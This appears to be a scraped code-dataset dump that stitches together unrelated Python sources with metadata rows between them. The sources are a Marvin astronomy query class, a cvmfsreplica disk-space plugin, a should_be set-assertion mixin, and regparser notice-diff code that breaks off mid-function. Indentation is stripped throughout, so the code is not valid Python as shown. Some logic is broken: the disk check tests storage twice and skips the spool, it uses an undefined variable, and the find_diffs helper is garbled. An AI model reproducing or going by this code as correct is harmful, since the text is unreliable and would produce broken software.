''' this is now broken, this should update the boolean params in the filter condition '''
''' Update any input parameters that have been bound already. Input is a dictionary of key, value pairs representing
parameter name to update, and the value (number only) to update. This does not allow to change the operand.
Does not update self.params
e.g.
original input parameters {'nsa.z': '< 0.012'}
newparams = {'nsa.z': '0.2'}
update_params(newparams)
new condition will be nsa.z < 0.2
'''
param = {key: unicode(val) if '*' not in unicode(val) else unicode(val.replace('*', '%')) for key, val in param.items() if key in self.filterparams.keys()}
self.query = self.query.params(param)
def _alreadyInFilter(self, names):
''' Checks if the parameter name already added into the filter '''
infilter = None
if names:
if not isinstance(self.query, type(None)):
if not isinstance(self.query.whereclause, type(None)):
wc = str(self.query.whereclause.compile(dialect=postgresql.dialect(), compile_kwargs={'literal_binds': True}))
infilter = any([name in wc for name in names])
return infilter
@makeBaseQuery
@checkCondition
@updateConfig
def run(self, start=None, end=None, raw=None, orm=None, core=None):
''' Runs a Marvin Query
Runs the query and return an instance of Marvin Results class
to deal with results.
Parameters:
start (int):
Starting value of a subset. Default is None
end (int):
Ending value of a subset. Default is None
Returns:
results (object):
An instance of the Marvin Results class containing the
results from the Query.
'''
if self.mode == 'local':
# Check for adding a sort
self._sortQuery()
# Check to add the cache
if self._caching:
from marvin.core.caching_query import FromCache
self.query = self.query.options(FromCache("default")).\
options(*marvindb.cache_bits)
# turn on streaming of results
self.query = self.query.execution_options(stream_results=True)
# get total count, and if more than 150 results, paginate and only return the first 100
starttime = datetime.datetime.now()
# check for query and get count
if marvindb.isdbconnected:
qm = self._check_history(check_only=True)
self.totalcount = qm.count if qm else None
# run count if it doesn't exist
if self.totalcount is None:
self.totalcount = self.query.count()
# get the new count if start and end exist
if start and end:
count = (end - start)
else:
count = self.totalcount
# # run the query
# res = self.query.slice(start, end).all()
# count = len(res)
# self.totalcount = count if not self.totalcount else self.totalcount
# check history
if marvindb.isdbconnected:
query_meta = self._check_history()
if count > self.count_threshold and self.return_all is False:
# res = res[0:self.limit]
start = 0
end = self.limit
count = (end - start)
warnings.warn('Results contain more than {0} entries. '
'Only returning first {1}'.format(self.count_threshold, self.limit), MarvinUserWarning)
elif self.return_all is True:
warnings.warn('Warning: Attempting to return all results. This may take a long time or crash.', MarvinUserWarning)
start = None
end = None
elif start and end:
warnings.warn('Getting subset of data {0} to {1}'.format(start, end), MarvinUserWarning)
# slice the query
query = self.query.slice(start, end)
# run the query
if not any([raw, core, orm]):
raw = True
if raw:
# use the db api cursor
sql = str(self._get_sql(query))
conn = marvindb.db.engine.raw_connection()
cursor = conn.cursor('query_cursor')
cursor.execute(sql)
res = self._fetch_data(cursor)
conn.close()
elif core:
# use the core connection
sql = str(self._get_sql(query))
with marvindb.db.engine.connect() as conn:
results = conn.execution_options(stream_results=True).execute(sql)
res = self._fetch_data(results)
elif orm:
# use the orm query
yield_num = int(10**(np.floor(np.log10(self.totalcount))))
results = string_folding_wrapper(query.yield_per(yield_num), keys=self.params)
res = list(results)
# get the runtime
endtime = datetime.datetime.now()
self.runtime = (endtime - starttime)
# clear the session
self.session.close()
# pass the results into Marvin Results
final = Results(results=res, query=query, count=count, mode=self.mode,
returntype=self.returntype, queryobj=self, totalcount=self.totalcount,
chunk=self.limit, runtime=self.runtime, start=start, end=end)
# get the final time
posttime = datetime.datetime.now()
self.finaltime = (posttime - starttime)
return final
elif self.mode == 'remote':
# Fail if no route map initialized
if not config.urlmap:
raise MarvinError('No URL Map found. Cannot make remote call')
if self.return_all:
warnings.warn('Warning: Attempting to return all results. This may take a long time or crash.')
# Get the query route
url = config.urlmap['api']['querycubes']['url']
params = {'searchfilter': self.searchfilter,
'params': ','.join(self._returnparams) if self._returnparams else None,
'returntype': self.returntype,
'limit': self.limit,
'sort': self.sort, 'order': self.order,
'release': self._release,
'return_all': self.return_all,
'start': start,
'end': end,
'caching': self._caching}
try:
ii = Interaction(route=url, params=params, stream=True)
except Exception as e:
# if a remote query fails for any reason, then try to clean them up
# self._cleanUpQueries()
raise MarvinError('API Query call failed: {0}'.format(e))
else:
res = ii.getData()
self.queryparams_order = ii.results['queryparams_order']
self.params = ii.results['params']
self.query = ii.results['query']
count = ii.results['count']
chunk = int(ii.results['chunk'])
totalcount = ii.results['totalcount']
query_runtime = ii.results['runtime']
resp_runtime = ii.response_time
if self.return_all:
msg = 'Returning all {0} results'.format(totalcount)
else:
msg = 'Only returning the first {0} results.'.format(count)
if not self.quiet:
print('Results contain of a total of {0}. {1}'.format(totalcount, msg))
return Results(results=res, query=self.query, mode=self.mode, queryobj=self, count=count,
returntype=self.returntype, totalcount=totalcount, chunk=chunk,
runtime=query_runtime, response_time=resp_runtime, start=start, end=end)
def _fetch_data(self, obj):
''' Fetch query using fetchall or fetchmany '''
res = []
if not self.return_all:
res = obj.fetchall()
else:
while True:
rows = obj.fetchmany(100000)
if rows:
res.extend(rows)
else:
break
return res
def _check_history(self, check_only=None):
''' Check the query against the query history schema '''
sqlcol = self.marvinform._param_form_lookup.mapToColumn('sql')
stringfilter = self.searchfilter.strip().replace(' ', '')
rawsql = self.show().strip()
return_params = ','.join(self._returnparams)
qm = self.session.query(sqlcol.class_).\
filter(sqlcol == rawsql, sqlcol.class_.release == self._release).one_or_none()
if check_only:
return qm
with self.session.begin():
if not qm:
qm = sqlcol.class_(searchfilter=stringfilter, n_run=1, release=self._release,
count=self.totalcount, sql=rawsql, return_params=return_params)
self.session.add(qm)
else:
qm.n_run += 1
return qm
def _cleanUpQueries(self):
''' Attempt to clean up idle queries on the server
This is a hack to try to kill all idl processes on the server.
Using pg_terminate_backend and pg_stat_activity it terminates all
transactions that are in an idle, or idle in transaction, state
that have running for > 1 minute, and whose application_name is
not psql, and the process is not the one initiating the terminate.
The rank part ranks the processes and originally killed all > 1, to
leave one alive as a warning to the others. I've changed this to 0
to kill everything.
I think this will sometimes also leave a newly orphaned idle
ROLLBACK transaction. Not sure why.
'''
if self.mode == 'local':
sql = ("with inactive as (select p.pid, rank() over (partition by \
p.client_addr order by p.backend_start ASC) as rank from \
pg_stat_activity as p where p.application_name !~ 'psql' \
and p.state ilike '%idle%' and p.pid <> pg_backend_pid() and \
current_timestamp-p.state_change > interval '1 minutes') \
select pg_terminate_backend(pid) from inactive where rank > 0;")
self.session.expire_all()
self.session.expunge_all()
res = self.session.execute(sql)
tmp = res.fetchall()
#self.session.close()
#marvindb.db.engine.dispose()
elif self.mode == 'remote':
# Fail if no route map initialized
if not config.urlmap:
raise MarvinError('No URL Map found. Cannot make remote call')
# Get the query route
url = config.urlmap['api']['cleanupqueries']['url']
params = {'task': 'clean', 'release': self._release}
try:
ii = Interaction(route=url, params=params)
except Exception as e:
raise MarvinError('API Query call failed: {0}'.format(e))
else:
res = ii.getData()
def _getIdleProcesses(self):
''' Get a list of all idle processes on server
This grabs a list of all processes in a state of
idle, or idle in transaction using pg_stat_activity
and returns the process id, the state, and the query
'''
if self.mode == 'local':
sql = ("select p.pid,p.state,p.query from pg_stat_activity as p \
where p.state ilike '%idle%';")
res = self.session.execute(sql)
procs = res.fetchall()
elif self.mode == 'remote':
# Fail if no route map initialized
if not config.urlmap:
raise MarvinError('No URL Map found. Cannot make remote call')
# Get the query route
url = config.urlmap['api']['cleanupqueries']['url']
params = {'task': 'getprocs', 'release': self._release}
try:
ii = Interaction(route=url, params=params)
except Exception as e:
raise MarvinError('API Query call failed: {0}'.format(e))
else:
procs = ii.getData()
return procs
def _sortQuery(self):
''' Sort the query by a given parameter '''
if not isinstance(self.sort, type(None)):
# set the sort variable ModelClass parameter
if '.' in self.sort:
param = self.datamodel.parameters[str(self.sort)].full
else:
param = self.datamodel.parameters.get_full_from_remote(self.sort)
sortparam = self.marvinform._param_form_lookup.mapToColumn(param)
# If order is specified, then do the sort
if self.order:
assert self.order in ['asc', 'desc'], 'Sort order parameter must be either "asc" or "desc"'
# Check if order by already applied
if 'ORDER' in str(self.query.statement):
self.query = self.query.order_by(None)
# Do the sorting
if 'desc' in self.order:
self.query = self.query.order_by(desc(sortparam))
else:
self.query = self.query.order_by(sortparam)
@updateConfig
def show(self, prop=None):
''' Prints into to the console
Displays the query to the console with parameter variables plugged in.
Works only in local mode. Input prop can be one of Can be one of query,
tables, joins, or filter.
Only works in LOCAL mode.
Allowed Values for Prop:
query - displays the entire query (default if nothing specified)
tables - displays the tables that have been joined in the query
joins - same as table
filter - displays only the filter used on the query
Parameters:
prop (str):
The type of info to print.
Example:
TODO add example
'''
assert prop in [None, 'query', 'tables', 'joins', 'filter'], 'Input must be query, tables, joins, or filter'
if self.mode == 'local':
if not prop or 'query' in prop:
sql = self._get_sql(self.query)
elif prop == 'tables':
sql = self.joins
elif prop == 'filter':
'''oddly this does not update when bound parameters change, but the statement above does '''
sql = self.query.whereclause.compile(dialect=postgresql.dialect(), compile_kwargs={'literal_binds': True})
else:
sql = self.__getattribute__(prop)
return str(sql)
elif self.mode == 'remote':
sql = 'Cannot show full SQL query in remote mode, use the Results showQuery'
warnings.warn(sql, MarvinUserWarning)
return sql
def _get_sql(self, query):
''' Get the sql for a given query
Parameters:
query (object):
An SQLAlchemy Query object
Returms:
A raw sql string
'''
return query.statement.compile(dialect=postgresql.dialect(), compile_kwargs={'literal_binds': True})
def reset(self):
''' Resets all query attributes '''
self.__init__()
@updateConfig
def _createBaseQuery(self):
''' Create the base query session object. Passes in a list of parameters defined in
returnparams, filterparams, and defaultparams
'''
labeledqps = [qp.label(self.params[i]) for i, qp in enumerate(self.queryparams)]
self.query = self.session.query(*labeledqps)
def _query_column(self, column_name):
''' query and return a specific column from the current query '''
qp = self.marvinform._param_form_lookup.mapToColumn(column_name)
qp = qp.label(column_name)
return self.query.from_self(qp).all()
def _getPipeInfo(self, pipename):
''' Retrieve the pipeline Info for a given pipeline version name '''
assert pipename.lower() in ['drp', 'dap'], 'Pipeline Name must either be DRP or DAP'
# bindparam values
bindname = 'drpver' if pipename.lower() == 'drp' else 'dapver'
bindvalue = self._drpver if pipename.lower() == 'drp' else self._dapver
# class names
if pipename.lower() == 'drp':
inclasses = self._tableInQuery('cube') or 'cube' in str(self.query.statement.compile())
elif pipename.lower() == 'dap':
inclasses = self._tableInQuery('file') or 'file' in str(self.query.statement.compile())
# set alias
pipealias = self._drp_alias if pipename.lower() == 'drp' else self._dap_alias
# get the pipeinfo
if inclasses:
pipeinfo = marvindb.session.query(pipealias).\
join(marvindb.datadb.PipelineName, marvindb.datadb.PipelineVersion).\
filter(marvindb.datadb.PipelineName.label == pipename.upper(),
marvindb.datadb.PipelineVersion.version == bindparam(bindname, bindvalue)).one()
else:
pipeinfo = None
return pipeinfo
def _addPipeline(self):
''' Adds the DRP and DAP Pipeline Info into the Query '''
self._drp_alias = aliased(marvindb.datadb.PipelineInfo, name='drpalias')
self._dap_alias = aliased(marvindb.datadb.PipelineInfo, name='dapalias')
drppipe = self._getPipeInfo('drp')
dappipe = self._getPipeInfo('dap')
# Add DRP pipeline version
if drppipe:
self.query = self.query.join(self._drp_alias, marvindb.datadb.Cube.pipelineInfo).\
filter(self._drp_alias.pk == drppipe.pk)
# Add DAP pipeline version
if dappipe:
self.query = self.query.join(self._dap_alias, marvindb.dapdb.File.pipelineinfo).\
filter(self._dap_alias.pk == dappipe.pk)
@makeBaseQuery
def _tableInQuery(self, name):
''' Checks if a given SQL table is already in the SQL query '''
# do the check
try:
isin = name in str(self.query._from_obj[0])
except IndexError as e:
isin = False
except AttributeError as e:
if isinstance(self.query, six.string_types):
isin = name in self.query
else:
isin = False
return isin
def _group_by(self, params=None):
''' Group the query by a set of parameters
Parameters:
params (list):
A list of string parameter names to group the query by
Returns:
A new SQLA Query object
'''
if not params:
params = [d for d in self.defaultparams if 'spaxelprop' not in d]
newdefaults = self.marvinform._param_form_lookup.mapToColumn(params)
self.params = params
newq = self.query.from_self(*newdefaults).group_by(*newdefaults)
return newq
# ------------------------------------------------------
# DAP Specific Query Modifiers - subqueries, etc go below here
# -----------------------------------------------------
def _buildDapQuery(self):
''' Builds a DAP zonal query
'''
# get the appropriate Junk (SpaxelProp) ModelClass
self._junkclass = self.marvinform.\
_param_form_lookup['spaxelprop.file'].Meta.model
# get good spaxels
# bingood = self.getGoodSpaxels()
# self.query = self.query.\
# join(bingood, bingood.c.binfile == marvindb.dapdb.Junk.file_pk)
# check for additional modifier criteria
if self._parsed.functions:
# loop over all functions
for fxn in self._parsed.functions:
# look up the function name in the marvinform dictionary
try:
methodname = self.marvinform._param_fxn_lookup[fxn.fxnname]
except KeyError as e:
self.reset()
raise MarvinError('Could not set function: {0}'.format(e))
else:
# run the method
methodcall = self.__getattribute__(methodname)
methodcall(fxn)
def _check_dapall_query(self):
''' Checks if the query is on the DAPall table. '''
isdapall = self._check_query('dapall')
if isdapall:
self.query = self._group_by()
def _getGoodSpaxels(self):
''' Subquery - Counts the number of good spaxels
Counts the number of good spaxels with binid != -1
Uses the junk.bindid_pk != 9999 since this is known and set.
Removes need to join to the binid table
Returns:
bincount (subquery):
An SQLalchemy subquery to be joined into the main query object
'''
spaxelname = self._junkclass.__name__
bincount = self.session.query(self._junkclass.file_pk.label('binfile'),
func.count(self._junkclass.pk).label('goodcount'))
# optionally add the filter if the table is SpaxelProp
if 'CleanSpaxelProp' not in spaxelname:
bincount = bincount.filter(self._junkclass.binid != -1)
# group the results by file_pk
bincount = bincount.group_by(self._junkclass.file_pk).subquery('bingood', with_labels=True)
return bincount
def _getCountOf(self, expression):
''' Subquery - Counts spaxels satisfying an expression
Counts the number of spaxels of a given
parameter above a certain value.
Parameters:
expression (str):
The filter expression to parse
Returns:
valcount (subquery):
An SQLalchemy subquery to be joined into the main query object
Example:
>>> expression = 'junk.emline_gflux_ha_6564 >= 25'
'''
# parse the expression into name, operator, value
param, ops, value = self._parseExpression(expression)
# look up the InstrumentedAttribute, Operator, and convert Value
attribute = self.marvinform._param_form_lookup.mapToColumn(param)
op = opdict[ops]
value = float(value)
# Build the subquery
valcount = self.session.query(self._junkclass.file_pk.label('valfile'),
(func.count(self._junkclass.pk)).label('valcount')).\
filter(op(attribute, value)).\
group_by(self._junkclass.file_pk).subquery('goodhacount', with_labels=True)
return valcount
def getPercent(self, fxn, **kwargs):
''' Query - Computes count comparisons
Retrieves the number of objects that have satisfy a given expression
in x% of good spaxels. Expression is of the form
Parameter Operand Value. This function is mapped to
the "npergood" filter name.
Syntax: fxnname(expression) operator value
Parameters:
fxn (str):
The function condition used in the query filter
Example:
>>> fxn = 'npergood(junk.emline_gflux_ha_6564 > 25) >= 20'
>>> Syntax: npergood() - function name
>>> npergood(expression) operator value
>>>
>>> Select objects that have Ha flux > 25 in more than
>>> 20% of their (good) spaxels.
'''
# parse the function into name, condition, operator, and value
name, condition, ops, value = self._parseFxn(fxn)
percent = float(value) / 100.
op = opdict[ops]
# Retrieve the necessary subqueries
bincount = self._getGoodSpaxels()
valcount = self._getCountOf(condition)
# Join to the main query
self.query = self.query.join(bincount, bincount.c.binfile == self._junkclass.file_pk).\
join(valcount, valcount.c.valfile == self._junkclass.file_pk).\
filter(op(valcount.c.valcount, percent * bincount.c.goodcount))
# Group the results by main defaultdatadb parameters,
# so as not to include all spaxels
newdefs = [d for d in self.defaultparams if 'spaxelprop' not in d]
self.query = self._group_by(params=newdefs)
# newdefaults = self.marvinform._param_form_lookup.mapToColumn(newdefs)
# self.params = newdefs
# self.query = self.query.from_self(*newdefaults).group_by(*newdefaults)
def _parseFxn(self, fxn):
''' Parse a fxn condition '''
return fxn.fxnname, fxn.fxncond, fxn.op, fxn.value
def _parseExpression(self, expr):
''' Parse an expression '''
return expr.fullname, expr.op, expr.value
def _checkParsed(self):
''' Check the boolean parsed object
check for function conditions vs normal. This should be moved
into SQLalchemy Boolean Search
'''
# Triggers for only one filter and it is a function condition
if hasattr(self._parsed, 'fxn'):
self._parsed.functions = [self._parsed]
# Checks for shortcut names and replaces them in params
# now redundant after pre-check on searchfilter
for key, val in self._parsed.params.items():
if key in self.marvinform._param_form_lookup._nameShortcuts.keys():
newkey = self.marvinform._param_form_lookup._nameShortcuts[key]
self._parsed.params.pop(key)
self._parsed.params.update({newkey: val})
| bsd-3-clause | -8,159,977,522,495,439,000 | 38.402402 | 184 | 0.582997 | false | 4.218971 | false | false | false |
jose-caballero/cvmfsreplica | cvmfsreplica/plugins/repository/acceptance/Diskspace.py | 1 | 3196 | #!/usr/bin/env python
import logging
import os
from cvmfsreplica.cvmfsreplicaex import PluginConfigurationFailure, AcceptancePluginFailed
from cvmfsreplica.interfaces import RepositoryPluginAcceptanceInterface
from cvmfsreplica.utils import check_disk_space
import cvmfsreplica.pluginsmanagement as pm
class Diskspace(RepositoryPluginAcceptanceInterface):
def __init__(self, repository, conf):
self.log = logging.getLogger('cvmfsreplica.diskspace')
self.repository = repository
self.conf = conf
try:
self.spool_size = self.conf.getint('diskspace.spool_size')
self.storage_size = self.conf.getint('diskspace.storage_size')
self.reportplugins = pm.readplugins(self.repository,
'repository',
'report',
self.conf.namespace('acceptance.diskspace.',
exclude=True)
)
except:
raise PluginConfigurationFailure('failed to initialize Diskspace plugin')
try:
self.should_abort = self.conf.getboolean('diskspace.should_abort')
except:
self.should_abort = True #Default
self.log.debug('plugin Diskspace initialized properly')
def verify(self):
'''
checks if there is enough space in disk
'''
try:
return self._check_storage() & self._check_storage()
except Exception, ex:
raise ex
def _check_spool(self):
# FIXME: too much duplicated code
SPOOL_DIR = self.repository.cvmfsconf.get('CVMFS_SPOOL_DIR')
if check_disk_space(SPOOL_DIR, self.spool_size):
self.log.trace('There is enough disk space for SPOOL directory')
return True
else:
msg = 'There is not enough disk space for SPOOL. Requested=%s, available=%s' %(self.spool_size, current_free_size)
self._notify_failure(msg)
self.log.error(msg)
if self.should_abort:
self.log.error('Raising exception')
raise AcceptancePluginFailed(msg)
else:
return False
def _check_storage(self):
# FIXME: too much duplicated code
STORAGE_DIR = self.repository.cvmfsconf.get('CVMFS_UPSTREAM_STORAGE').split(',')[1]
if check_disk_space(STORAGE_DIR, self.storage_size):
self.log.trace('There is enough disk space for STORAGE directory')
return True
else:
msg = 'There is not enough disk space for STORAGE. Requested=%s, available=%s' %(self.storage_size, current_free_size)
self._notify_failure(msg)
self.log.error(msg)
if self.should_abort:
self.log.error('Raising exception')
raise AcceptancePluginFailed(msg)
else:
return False
def _notify_failure(self, msg):
for report in self.reportplugins:
report.notifyfailure(msg)
| gpl-3.0 | -788,731,355,503,030,800 | 34.910112 | 130 | 0.576033 | false | 4.46993 | false | false | false |
DirectXMan12/should_be | should_be/extensions/set.py | 1 | 1342 | from should_be.core import BaseMixin, ObjectMixin
try:
from collections.abc import Set
except ImportError:
# python < 3.3
from collections import Set
class SetMixin(BaseMixin):
target_class = Set
def should_be(self, target):
msg_smaller = ('{txt} should have been {val}, but did not have '
'the items {items}')
msg_bigger = ('{txt} should have been {val}, but had the extra '
'items {items}')
msg_diff = ('{txt} should have been {val}, but differed in items '
'{i1} and {i2}')
try:
we_had = self - target
they_had = target - self
if (len(we_had) != 0 and len(they_had) != 0):
self.should_follow(len(we_had) == len(they_had) == 0, msg_diff,
val=target,
i1=we_had,
i2=they_had)
self.should_follow(len(we_had) == 0, msg_bigger,
val=target,
items=we_had)
self.should_follow(len(they_had) == 0, msg_smaller,
val=target,
items=they_had)
except TypeError:
ObjectMixin.should_be.__get__(self)(target)
| isc | 2,964,873,579,717,726,000 | 34.315789 | 79 | 0.464978 | false | 4.017964 | false | false | false |
grapesmoker/regulations-parser | regparser/notice/diff.py | 3 | 26343 | # vim: set encoding=utf-8
from itertools import takewhile
import re
from copy import copy
from lxml import etree
from regparser.grammar import amdpar, tokens
from regparser.tree.struct import Node
from regparser.tree.xml_parser.reg_text import build_from_section
from regparser.tree.xml_parser.tree_utils import get_node_text
def clear_between(xml_node, start_char, end_char):
"""Gets rid of any content (including xml nodes) between chars"""
as_str = etree.tostring(xml_node, encoding=unicode)
start_char, end_char = re.escape(start_char), re.escape(end_char)
pattern = re.compile(
start_char + '[^' + end_char + ']*' + end_char, re.M + re.S + re.U)
return etree.fromstring(pattern.sub('', as_str))
def remove_char(xml_node, char):
"""Remove from this node and all its children"""
as_str = etree.tostring(xml_node, encoding=unicode)
return etree.fromstring(as_str.replace(char, ''))
def fix_section_node(paragraphs, amdpar_xml):
""" When notices are corrected, the XML for notices doesn't follow the
normal syntax. Namely, pargraphs aren't inside section tags. We fix that
here, by finding the preceding section tag and appending paragraphs to it.
"""
sections = [s for s in amdpar_xml.itersiblings(preceding=True)
if s.tag == 'SECTION']
# Let's only do this if we find one section tag.
if len(sections) == 1:
section = copy(sections[0])
for paragraph in paragraphs:
section.append(copy(paragraph))
return section
def find_lost_section(amdpar_xml):
""" This amdpar doesn't have any following siblings, so we
look in the next regtext """
reg_text = amdpar_xml.getparent()
reg_text_siblings = [s for s in reg_text.itersiblings()
if s.tag == 'REGTEXT']
if len(reg_text_siblings) > 0:
candidate_reg_text = reg_text_siblings[0]
amdpars = [a for a in candidate_reg_text if a.tag == 'AMDPAR']
if len(amdpars) == 0:
# Only do this if there are not AMDPARS
for c in candidate_reg_text:
if c.tag == 'SECTION':
return c
def find_section(amdpar_xml):
""" With an AMDPAR xml, return the first section
sibling """
siblings = [s for s in amdpar_xml.itersiblings()]
if len(siblings) == 0:
return find_lost_section(amdpar_xml)
section = None
for sibling in amdpar_xml.itersiblings():
if sibling.tag == 'SECTION':
section = sibling
if section is None:
paragraphs = [s for s in amdpar_xml.itersiblings() if s.tag == 'P']
if len(paragraphs) > 0:
return fix_section_node(paragraphs, amdpar_xml)
return section
def find_subpart(amdpar_tag):
""" Look amongst an amdpar tag's siblings to find a subpart. """
for sibling in amdpar_tag.itersiblings():
if sibling.tag == 'SUBPART':
return sibling
def find_diffs(xml_tree, cfr_part):
"""Find the XML nodes that are needed to determine diffs"""
# Only final notices have this format
for section in xml_tree.xpath('//REGTEXT//SECTION'):
section = clear_between(section, '[', ']')
section = remove_char(remove_char(section, u'▸'), u'◂')
for node in build_from_section(cfr_part, section):
def per_node(node):
if node_is_empty(node):
for c in node.children:
per_node(c)
per_node(node)
def node_is_empty(node):
"""Handle different ways the regulation represents no content"""
return node.text.strip() == ''
def switch_context(token_list, carried_context):
""" Notices can refer to multiple regulations (CFR parts). If the
CFR part changes, empty out the context that we carry forward. """
def is_valid_label(label):
return label and label[0] is not None
if carried_context and carried_context[0] is not None:
token_list = [t for t in token_list if hasattr(t, 'label')]
reg_parts = [t.label[0] for t in token_list if is_valid_label(t.label)]
if len(reg_parts) > 0:
reg_part = reg_parts[0]
if reg_part != carried_context[0]:
return []
return carried_context
def contains_one_instance(tokenized, element):
""" Return True if tokenized contains only one instance of the class
element. """
contexts = [t for t in tokenized if isinstance(t, element)]
return len(contexts) == 1
def contains_one_paragraph(tokenized):
""" Returns True if tokenized contains only one tokens.Paragraph """
return contains_one_instance(tokenized, tokens.Paragraph)
def contains_delete(tokenized):
""" Returns True if tokenized contains at least one DELETE. """
contexts = [t for t in tokenized if t.match(tokens.Verb, verb='DELETE')]
return len(contexts) > 0
def remove_false_deletes(tokenized, text):
""" Sometimes a statement like 'Removing the 'x' from the end of
paragraph can be confused as removing the paragraph. Ensure that
doesn't happen here. Likely this method needs a little more work. """
if contains_delete(tokenized):
if contains_one_paragraph(tokenized):
if 'end of paragraph' in text:
return []
return tokenized
def paragraph_in_context_moved(tokenized, initial_context):
"""Catches this situation: "Paragraph 1 under subheading 51(b)(1) is
redesignated as paragraph 7 under subheading 51(b)", i.e. a Paragraph
within a Context moved to another Paragraph within a Context. The
contexts and paragraphs in this situation need to be swapped."""
final_tokens = []
idx = 0
while idx < len(tokenized) - 4:
par1, cont1, verb, par2, cont2 = tokenized[idx:idx + 5]
if (par1.match(tokens.Paragraph) and cont1.match(tokens.Context)
and verb.match(tokens.Verb, verb=tokens.Verb.MOVE,
active=False)
and par2.match(tokens.Paragraph)
and cont2.match(tokens.Context)
and all(tok.label[1:2] == ['Interpretations']
for tok in (par1, cont1, par2, cont2))):
batch, initial_context = compress_context(
[cont1, par1, verb, cont2, par2], initial_context)
final_tokens.extend(batch)
idx += 5
else:
final_tokens.append(tokenized[idx])
idx += 1
final_tokens.extend(tokenized[idx:])
return final_tokens
def move_then_modify(tokenized):
"""The subject of modification may be implicit in the preceding move
operation: A is redesignated B and changed. Replace the operation with a
DELETE and a POST so it's easier to compile later."""
final_tokens = []
idx = 0
while idx < len(tokenized) - 3:
move, p1, p2, edit = tokenized[idx:idx + 4]
if (move.match(tokens.Verb, verb=tokens.Verb.MOVE, active=True)
and p1.match(tokens.Paragraph)
and p2.match(tokens.Paragraph)
and edit.match(tokens.Verb, verb=tokens.Verb.PUT,
active=True, and_prefix=True)):
final_tokens.append(tokens.Verb(tokens.Verb.DELETE, active=True))
final_tokens.append(p1)
final_tokens.append(tokens.Verb(tokens.Verb.POST, active=True))
final_tokens.append(p2)
idx += 4
else:
final_tokens.append(tokenized[idx])
idx += 1
final_tokens.extend(tokenized[idx:])
return final_tokens
def parse_amdpar(par, initial_context):
""" Parse the <AMDPAR> tags into a list of paragraphs that have changed.
"""
# Replace and "and"s in titles; they will throw off and_token_resolution
for e in filter(lambda e: e.text, par.xpath('./E')):
e.text = e.text.replace(' and ', ' ')
text = get_node_text(par, add_spaces=True)
tokenized = [t[0] for t, _, _ in amdpar.token_patterns.scanString(text)]
tokenized = compress_context_in_tokenlists(tokenized)
tokenized = resolve_confused_context(tokenized, initial_context)
tokenized = paragraph_in_context_moved(tokenized, initial_context)
tokenized = remove_false_deletes(tokenized, text)
tokenized = multiple_moves(tokenized)
tokenized = switch_passive(tokenized)
tokenized = and_token_resolution(tokenized)
tokenized, subpart = deal_with_subpart_adds(tokenized)
tokenized = context_to_paragraph(tokenized)
tokenized = move_then_modify(tokenized)
if not subpart:
tokenized = separate_tokenlist(tokenized)
initial_context = switch_context(tokenized, initial_context)
tokenized, final_context = compress_context(tokenized, initial_context)
amends = make_amendments(tokenized, subpart)
return amends, final_context
def multiple_moves(tokenized):
"""Phrases like paragraphs 1 and 2 are redesignated paragraphs 3 and 4
are replaced with Move(active), paragraph 1, paragraph 3, Move(active)
paragraph 2, paragraph 4"""
converted = []
skip = 0
for idx, el0 in enumerate(tokenized):
if skip:
skip -= 1
elif idx < len(tokenized) - 2:
el1, el2 = tokenized[idx+1:idx+3]
if (el0.match(tokens.TokenList) and el2.match(tokens.TokenList)
and el1.match(tokens.Verb, verb=tokens.Verb.MOVE,
active=False)
and len(el0.tokens) == len(el2.tokens)):
skip = 2
for tidx in range(len(el0.tokens)):
converted.append(el1.copy(active=True))
converted.append(el0.tokens[tidx])
converted.append(el2.tokens[tidx])
else:
converted.append(el0)
else:
converted.append(el0)
return converted
def switch_passive(tokenized):
"""Passive verbs are modifying the phrase before them rather than the
phrase following. For consistency, we flip the order of such verbs"""
if all(not t.match(tokens.Verb, active=False) for t in tokenized):
return tokenized
converted, remaining = [], tokenized
while remaining:
to_add = list(takewhile(
lambda t: not isinstance(t, tokens.Verb), remaining))
if len(to_add) < len(remaining):
# also take the verb
verb = remaining[len(to_add)].copy()
to_add.append(verb)
# switch verb to the beginning
if not verb.active:
to_add = to_add[-1:] + to_add[:-1]
verb.active = True
# may need to grab one more if the verb is move
if (verb.verb == tokens.Verb.MOVE
and len(to_add) < len(remaining)):
to_add.append(remaining[len(to_add)])
converted.extend(to_add)
remaining = remaining[len(to_add):]
return converted
def resolve_confused_context(tokenized, initial_context):
"""Resolve situation where a Context thinks it is regtext, but it
*should* be an interpretation"""
if initial_context[1:2] == ['Interpretations']:
final_tokens = []
for token in tokenized:
if (token.match(tokens.Context, tokens.Paragraph)
and len(token.label) > 1 and token.label[1] is None):
final_tokens.append(token.copy(
label=[token.label[0], 'Interpretations', token.label[2],
'(' + ')('.join(l for l in token.label[3:] if l)
+ ')']))
elif (token.match(tokens.Context, tokens.Paragraph)
and len(token.label) > 1 and
token.label[1].startswith('Appendix:')):
final_tokens.append(token.copy(
label=[token.label[0], 'Interpretations',
token.label[1][len('Appendix:'):],
'(' + ')('.join(l for l in token.label[2:] if l)
+ ')']))
elif token.match(tokens.TokenList):
sub_tokens = resolve_confused_context(token.tokens,
initial_context)
final_tokens.append(token.copy(tokens=sub_tokens))
else:
final_tokens.append(token)
return final_tokens
else:
return tokenized
def and_token_resolution(tokenized):
"""Troublesome case where a Context should be a Paragraph, but the only
indicator is the presence of an "and" token afterwards. We'll likely
want to expand this step in the future, but for now, we only catch a few
cases"""
# compress "and" tokens
tokenized = zip(tokenized, tokenized[1:] + [None])
tokenized = [l for l, r in tokenized
if l != r or not l.match(tokens.AndToken)]
# we'll strip out all "and" tokens in just a moment, but as a first
# pass, remove all those preceded by a verb (which makes the following
# logic simpler).
tokenized = list(reversed(tokenized))
tokenized = zip(tokenized, tokenized[1:] + [None])
tokenized = list(reversed([l for l, r in tokenized
if not l.match(tokens.AndToken) or not r
or not r.match(tokens.Verb)]))
# check for the pattern in question
final_tokens = []
idx = 0
while idx < len(tokenized) - 3:
t1, t2, t3, t4 = tokenized[idx:idx + 4]
if (t1.match(tokens.Verb) and t2.match(tokens.Context)
and t3.match(tokens.AndToken)
and t4.match(tokens.Paragraph, tokens.TokenList)):
final_tokens.append(t1)
final_tokens.append(tokens.Paragraph(t2.label))
final_tokens.append(t4)
idx += 3 # not 4 as one will appear below
elif t1 != tokens.AndToken:
final_tokens.append(t1)
idx += 1
final_tokens.extend(tokenized[idx:])
return final_tokens
def context_to_paragraph(tokenized):
"""Generally, section numbers, subparts, etc. are good contextual clues,
but sometimes they are the object of manipulation."""
# Don't modify anything if there are already paragraphs or no verbs
for token in tokenized:
if isinstance(token, tokens.Paragraph):
return tokenized
elif (isinstance(token, tokens.TokenList) and
